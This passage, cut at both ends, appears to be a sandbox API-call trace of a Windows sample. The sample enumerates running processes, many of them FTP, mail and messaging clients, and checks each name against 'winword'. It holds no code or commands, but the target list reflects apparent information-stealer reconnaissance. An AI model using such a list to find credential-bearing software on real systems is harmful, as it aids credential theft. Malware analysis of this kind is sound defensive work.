lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.447] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356d830 [0100.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x356d830, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.447] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0100.447] StrStrIA (lpFirst="alftp.exe", lpSrch="winword") returned 0x0 [0100.447] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0100.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.448] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356da58 [0100.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x356da58, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0100.449] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0100.449] StrStrIA (lpFirst="barca.exe", lpSrch="winword") returned 0x0 [0100.449] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0100.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.450] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356d7d0 [0100.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x356d7d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0100.450] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0100.450] StrStrIA (lpFirst="bitkinex.exe", lpSrch="winword") returned 0x0 [0100.450] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0100.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.451] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d938 [0100.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x356d938, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0100.451] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0100.451] StrStrIA (lpFirst="coreftp.exe", lpSrch="winword") returned 0x0 [0100.451] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0100.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.452] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e0c8 [0100.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e0c8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0100.453] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0100.453] StrStrIA (lpFirst="far.exe", lpSrch="winword") returned 0x0 [0100.453] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0100.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.454] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356d7e8 [0100.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x356d7e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0100.454] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0100.454] StrStrIA (lpFirst="filezilla.exe", lpSrch="winword") returned 0x0 [0100.454] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0100.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.455] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356d8c0 [0100.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x356d8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.455] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0100.458] StrStrIA (lpFirst="flashfxp.exe", lpSrch="winword") returned 0x0 [0100.458] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0100.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.459] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356d800 [0100.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x356d800, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0100.459] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0100.459] StrStrIA (lpFirst="fling.exe", lpSrch="winword") returned 0x0 [0100.460] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0100.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.461] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d268 [0100.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357d268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0100.461] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0100.461] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="winword") returned 0x0 [0100.461] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0100.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.462] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d108 [0100.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357d108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0100.463] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0100.463] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="winword") returned 0x0 [0100.463] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0100.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.464] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e188 [0100.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e188, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0100.464] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0100.464] StrStrIA (lpFirst="icq.exe", lpSrch="winword") returned 0x0 [0100.464] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0100.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.466] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356d908 [0100.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x356d908, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.466] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0100.466] StrStrIA (lpFirst="leechftp.exe", lpSrch="winword") returned 0x0 [0100.466] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0100.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.467] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356d920 [0100.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x356d920, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.467] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0100.467] StrStrIA (lpFirst="ncftp.exe", lpSrch="winword") returned 0x0 [0100.467] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0100.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.469] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d950 [0100.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x356d950, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0100.469] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0100.469] StrStrIA (lpFirst="notepad.exe", lpSrch="winword") returned 0x0 [0100.469] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0100.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.470] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356d968 [0100.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x356d968, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0100.470] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0100.470] StrStrIA (lpFirst="operamail.exe", lpSrch="winword") returned 0x0 [0100.470] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0100.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.471] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356dd10 [0100.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x356dd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0100.471] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0100.472] StrStrIA (lpFirst="pidgin.exe", lpSrch="winword") returned 0x0 [0100.472] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0100.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.473] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356dbf0 [0100.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x356dbf0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0100.473] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0100.473] StrStrIA (lpFirst="scriptftp.exe", lpSrch="winword") returned 0x0 [0100.473] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0100.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.474] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356dcf8 [0100.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x356dcf8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0100.474] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0100.475] StrStrIA (lpFirst="skype.exe", lpSrch="winword") returned 0x0 [0100.475] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0100.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.476] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356dd70 [0100.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x356dd70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.476] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0100.476] StrStrIA (lpFirst="smartftp.exe", lpSrch="winword") returned 0x0 [0100.476] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0100.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.478] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356db60 [0100.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x356db60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0100.478] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0100.478] StrStrIA (lpFirst="totalcmd.exe", lpSrch="winword") returned 0x0 [0100.478] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0100.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.479] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356db90 [0100.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x356db90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0100.479] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0100.479] StrStrIA (lpFirst="trillian.exe", lpSrch="winword") returned 0x0 [0100.480] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0100.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.481] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356daa0 [0100.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x356daa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0100.481] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0100.481] StrStrIA (lpFirst="webdrive.exe", lpSrch="winword") returned 0x0 [0100.481] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0100.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.482] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356db00 [0100.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x356db00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.482] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0100.482] StrStrIA (lpFirst="whatsapp.exe", lpSrch="winword") returned 0x0 [0100.482] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0100.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.483] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356dcb0 [0100.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, 